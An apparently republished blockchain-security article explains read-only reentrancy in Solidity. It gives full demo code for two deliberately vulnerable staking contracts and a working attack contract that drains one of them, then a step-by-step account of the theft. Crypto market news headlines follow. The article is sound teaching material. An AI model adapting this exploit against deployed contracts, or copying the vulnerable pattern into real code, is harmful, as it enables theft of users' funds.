Cointime

Cointime

Download App
iOS & Android

Essential Auditing Knowledge | What is the Difficult-to-Guard “Read-Only Reentrancy Attack”?

Recently, there have been multiple reentrancy exploits in Web3. Unlike traditional reentrancy vulnerabilities, these read-only reentrancy attacks occurred despite having reentrancy locks in place.

Today, Beosin security research team will explain what a "read-only reentrancy attack" is.

About Reentrancy

In Solidity smart contract programming, one smart contract is allowed to call code from another smart contract. In the business logic of many projects, there is a need to send ETH to a particular address, but if the ETH receiving address is a smart contract, it will call the fallback function of that smart contract. If a malicious actor writes crafted code in the fallback function of their contract, it can introduce the risk of a reentrancy vulnerability.

The attacker can re-initiate a call to the project's contract in the malicious contract's fallback function. At this point, the first call is not yet finished and some variables have not been updated. Making a second call in this state can cause the project contract to perform calculations using abnormal variables or allow the attacker to bypass certain checks.

In other words, the root of the reentrancy vulnerability is executing a transfer and then calling an interface of the destination contract, with the ledger change occurring after calling the destination contract, which causes checks to be bypassed. There is a lack of strict adherence to a checks-effects-interactions pattern. Therefore, in addition to Ethereum transfers causing reentrancy vulnerabilities, some improper designs can also lead to reentrancy attacks, for example:

1. Calling controllable external functions can introduce reentrancy risks

2. ERC721/ERC1155 safe transfer functions can lead to reentrancy

Reentrancy attacks are a common vulnerability currently. Most blockchain developers are aware of the dangers and implement reentrancy locks, preventing functions with the same reentrancy lock from being called again while one is currently executing. Although reentrancy locks can effectively prevent the above attacks, there is another type called "read-only reentrancy" that is difficult to safeguard against.

Read-Only Reentrancy

In the above, we introduced common types of reentrancy, the core of which is using an abnormal state after reentrancy to calculate a new state, resulting in abnormal state updates. Now, if the function we call is a read-only view function, there will be no state changes within the function, and calling it will not affect the current contract at all. Therefore, developers usually do not pay much attention to the reentrancy risks of these functions, and do not add reentrancy locks for them.

Although view functions basically has no impact on the current contract, there is another situation where a contract calls view functions of other contracts as data dependencies, and those view functions do not have reentrancy locks, which can lead to read-only reentrancy risks.

For example, project A's contract allows staking tokens and withdrawing tokens, and provides a function to query prices based on total staked LP tokens vs total supply. The staking and withdrawal functions have reentrancy locks between them, but the query function does not. Now there is another project B that provides staking and withdrawal functions with reentrancy locks between them, but both functions depend on project A's price query function for LP token calculations.

As described above, there is a read-only reentrancy risk between the two projects, as shown in the diagram below:

1. The attacker stakes and withdraws tokens in ContractA.

2. Withdrawing tokens calls the attacker's contract fallback function.

3. The attacker calls ContractB's staking function again within their contract.

4. The staking function calls ContractA's price calculation function. At this point ContractA's state is not yet updated, resulting in an incorrect price calculation and more LP tokens being calculated and sent to the attacker.

5. After reentrancy ends, ContractA's state is updated.

6. Finally, the attacker calls ContractB to withdraw tokens.

7. At this point ContractB is getting updated data, allowing the attacker to withdraw more tokens.

Code Analysis

Let's use the following demo to explain read-only reentrancy issues. The code below is just for testing purposes, there is no real business logic, it only serves as a reference for studying read-only reentrancy.

Implementing ContractA:

pragma solidity ^0.8.21;

contract ContractA {

  uint256 private _totalSupply;

  uint256 private _allstake;

  mapping (address => uint256) public _balances;

  bool check=true;

  /**

   * Reentrancy lock

  **/

  modifier noreentrancy(){

    require(check);

    check=false;

    _;

    check=true;

  }

  constructor(){

  }

  /**

   * Calculates staking value based on total supply of LP tokens vs total staked, with 10e8 precision.

  **/

  function get_price() public view virtual returns (uint256) {

    if(_totalSupply==0||_allstake==0) return 10e8;

    return _totalSupply*10e8/_allstake;

  }

  /**

   * Users can stake, which increases total staked and mints LP tokens.

  **/

  function deposit() public payable noreentrancy(){

    uint256 mintamount=msg.value*get_price()/10e8;

    _allstake+=msg.value;

    _balances[msg.sender]+=mintamount;

    _totalSupply+=mintamount;

  }

  /**

   * Users can withdraw, which decreases total staked and burns from total supply of LP tokens.

  **/

  function withdraw(uint256 burnamount) public noreentrancy(){

    uint256 sendamount=burnamount*10e8/get_price();

    _allstake-=sendamount;

    payable(msg.sender).call{value:sendamount}("");

    _balances[msg.sender]-=burnamount;

    _totalSupply-=burnamount;

  }

}

Deploy ContractA and stake 50 ETH, simulating a project already in operation.

Implement ContractB, depending on ContractA's get_price function:

pragma solidity ^0.8.21;

interface ContractA {

  function get_price() external view returns (uint256);

}

contract ContractB {

  ContractA contract_a;

  mapping (address => uint256) private _balances;

  bool check=true;

  modifier noreentrancy(){

    require(check);

    check=false;

    _;

    check=true;

  }

  constructor(){

  }

  function setcontracta(address addr) public {

    contract_a = ContractA(addr);

  }

  /**

   * Stake tokens, use ContractA's get_price() to calculate value of staked tokens, and mint that amount of LP tokens.

  **/

  function depositFunds() public payable noreentrancy(){

    uint256 mintamount=msg.value*contract_a.get_price()/10e8;

    _balances[msg.sender]+=mintamount;

  }

  /**

   * Withdraw tokens, use ContractA's get_price() to calculate value of LP tokens, and withdraw that amount of tokens.

  **/

  function withdrawFunds(uint256 burnamount) public payable noreentrancy(){

    _balances[msg.sender]-=burnamount;

    uint256 amount=burnamount*10e8/contract_a.get_price();

    msg.sender.call{value:amount}("");

  }

  function balanceof(address acount)public view returns (uint256){

    return _balances[acount];

  }

}

Deploy ContractB, set the ContractA address, and stake 30 ETH, also simulating a project in operation.

Implement the attack POC contract:

pragma solidity ^0.8.21;

interface ContractA {

  function deposit() external payable;

  function withdraw(uint256 amount) external;

}

interface ContractB {

  function depositFunds() external payable;

  function withdrawFunds(uint256 amount) external;

  function balanceof(address acount)external view returns (uint256);

}

contract POC {

  ContractA contract_a;

  ContractB contract_b;

  address payable _owner;

  uint flag=0;

  uint256 depositamount=30 ether;

  constructor() payable{

    _owner=payable(msg.sender);

  }

  function setaddr(address _contracta,address _contractb) public {

    contract_a=ContractA(_contracta);

    contract_b=ContractB(_contractb);

  }

  /**

   * Start function, which adds liquidity, removes liquidity, and finally withdraws tokens.

  **/

  function start(uint256 amount)public {

    contract_a.deposit{value:amount}();

    contract_a.withdraw(amount);

    contract_b.withdrawFunds(contract_b.balanceof(address(this)));

  }

  /**

   * Deposit function called during reentrancy.

  **/

  function deposit()internal {

    contract_b.depositFunds{value:depositamount}();

  }

  /**

   * Withdraw ETH after the attack

  **/

  function getEther() public {

    _owner.transfer(address(this).balance);

  }

  /**

   * Callback function, the key of reentrancy

  **/

  fallback()payable external {

    if(msg.sender==address(contract_a)){

      deposit();

    }

  }

}

Use a different EOA account to deploy the attack contract, transfer in 50 ETH, and set the ContractA and ContractB addresses.

Pass in 50000000000000000000 (50*10^18) to the start function and execute it. We see ContractB's 30 ETH has been transferred to the POC contract.

Call getEther again. The attacker address profited 30 ETH.

Code execution flow:

The start function first calls ContractA's deposit function to stake ETH, with the attacker passing in 5010^18. Together with the initial 5010^18 the contract already had, _allstake and _totalSupply are both now 100*10^18.

Next, the withdraw function of ContractA is called to withdraw tokens. The contract will first update _allstake, and send 50 ETH to the attacker’s contract, which will trigger the fallback function. Finally _totalSupply is updated.

In the fallback, the attacker contract calls ContractB's stake function to stake 30 ETH. Since get_price is a view function, ContractB successfully reenters ContractA's get_price here. At this point _totalSupply has not been updated yet, still 10010^18, but _allstake has reduced to 5010^18. So the returned value here will be doubled. The attacker contract will get 60*10^18 LP tokens.

After reentrancy completes, the attacker contract calls ContractB's withdraw function to withdraw ETH. At this point _totalSupply has been updated to 50*10^18, so the amount of ETH calculated will match the number of LP tokens. 60 ETH is transferred to the attacker’s contract, with the attacker profiting 30 ETH.

Security Recommendations

For projects that rely on other projects for data, you should thoroughly examine the combined business logic security when integrating the dependencies. Even if each project is secure in isolation, serious issues can appear when integrating them.

Beosin is a leading global blockchain security company co-founded by several professors from world-renowned universities and there are 40+ PhDs in the team, and set up offices in 10+ cities including Hong Kong, Singapore, Tokyo and Miami. With the mission of "Securing Blockchain Ecosystem", Beosin provides "All-in-one" blockchain security solution covering Smart Contract Audit, Risk Monitoring & Alert, KYT/AML, and Crypto Tracing. Beosin has already audited more than 3000 smart contracts including famous Web3 projects PancakeSwap, Uniswap, DAI, OKSwap and all of them are monitored by Beosin EagleEye. The KYT AML are serving 100+ institutions including Binance.

Contact

If you need any blockchain security services, welcome to contact us:

Official Website Beosin EagleEye Twitter Telegram Linkedin

Comments

All Comments

Recommended for you

  • The Bank of Japan is reportedly planning further interest rate hikes; some officials believe the neutral interest rate will be higher than 1%.

    according to insiders, Bank of Japan officials believe that before the current rate hike cycle ends, interest rates are likely to rise above 0.75%, indicating that there may be more rate hikes after next week's increase. These insiders said that officials believe that even if rates rise to 0.75%, the Bank of Japan has not yet reached the neutral interest rate level. Some officials already consider 1% to still be below the neutral interest rate level. Insiders stated that even if the Bank of Japan updates its neutral rate estimates based on the latest data, it currently does not believe that this range will significantly narrow. Currently, the Bank of Japan's estimate for the nominal neutral interest rate range is about 1% to 2.5%. Insiders said that Bank of Japan officials also believe there may be errors in the upper and lower limits of this range itself. (Golden Ten)

  • OKX: Platform users can earn up to 4.10% annualized return by holding USDG.

    According to the official announcement, from 00:00 on December 11, 2025 to 00:00 on January 11, 2026 (UTC+8), users holding USDG in their OKX funding, trading, and lending accounts can automatically earn an annualized yield of up to 4.10% provided by the OKX platform, with the ability to withdraw or use it at any time, allowing both trading and wealth management simultaneously. Users can check their earnings anytime through the OKX APP (version 6.136.10 and above) - Assets - by clicking on USDG. Moving forward, the platform will continue to expand the application of USDG in more trading and wealth management scenarios.

  • The Federal Reserve will begin its Reserve Management Purchase (RMP) program today, purchasing $40 billion in Treasury bonds per month.

     according to the Federal Reserve Open Market Committee's decision on December 10, the Federal Reserve will start implementing the Reserve Management Purchase (RMP) program from December 12, purchasing a total of $40 billion in short-term Treasury securities in the secondary market.

  • Bitcoin treasury company Strategy's daily transaction volume has now surpassed that of payment giant Visa.

    according to market sources: the daily trading volume of Bitcoin treasury company Strategy (MSTR) has now surpassed the payment giant Visa.

  • The US spot Bitcoin ETF saw a net outflow of $78.35 million yesterday.

    according to Trader T's monitoring, the US spot Bitcoin ETF had a net outflow of $78.35 million yesterday.

  • JPMorgan Chase issues Galaxy short-term bonds on Solana network

     JPMorgan arranged and created, distributed, and settled a short-term bond on the Solana blockchain for Galaxy Digital Holdings LP, as part of efforts to enhance financial market efficiency using underlying cryptocurrency technology.

  • HSBC expects the Federal Reserve to refrain from cutting interest rates for the next two years.

    HSBC Securities predicts the Federal Reserve will maintain interest rates stable at the 3.5%-3.75% range set on Wednesday for the next two years. Previously, Federal Reserve policymakers lowered rates by 25 basis points with a split vote. The institution's U.S. economist Ryan Wang pointed out in a report on December 10 that Federal Reserve Chairman Jerome Powell was "open to the question of whether and when to further cut rates at next year's FOMC press conference." "We believe the FOMC will keep the federal funds rate target range unchanged at 3.50%-3.75% throughout 2026 and 2027, but as the economy evolves, as in the past, it is always necessary to pay close attention to the significant two-way risks facing this outlook."

  • Institution: US AI companies face power pressures that will drive up operating costs.

    Benjamin Melman, Chief Investment Officer of asset management company Edmond de Rothschild, pointed out that American artificial intelligence companies are facing intense competition in terms of electricity costs. He stated that the current power capacity in the U.S. is insufficient to meet the growing demand of AI companies, and electricity prices are significantly higher compared to other countries. "The U.S. faces intense competition in electricity costs, which will drive up the operating costs of AI."

  • Institutions: The US dollar may face further pressure next year, with AI bubble and interest rate outlook being key risks.

    Benjamin Melman, CEO of asset management company Edmond de Rothschild, stated that the US dollar may face downside risks again next year. "If the market worries again about US interest rates or if the artificial intelligence bubble suddenly bursts, the US dollar will be at risk." With the Federal Reserve cutting interest rates, the US dollar has continued to weaken this year. The US Dollar Index (DXY) recently fell 0.05% to 98.59. In mid-September, the index hit a three-and-a-half-year low of 96.218. 

  • Zixi.eth ·

    Nivex’s Global Strategy and the Massive Opportunities in Emerging Web3 Markets

    Nivex’s Global Strategy and the Massive Opportunities in Emerging Web3 Markets

Daily Must-Read

Popular Activities

RaveDAO at Terra Solis by Tomorrowland: A Female-Led Techno Night Where Web3 Culture Converges

RaveDAO at Terra Solis by Tomorrowland: A Female-Led Techno Night Where Web3 Culture Converges

April 30 - April 30
Dubai

Popular Tags

Cointime
News
Contents
RSS
Company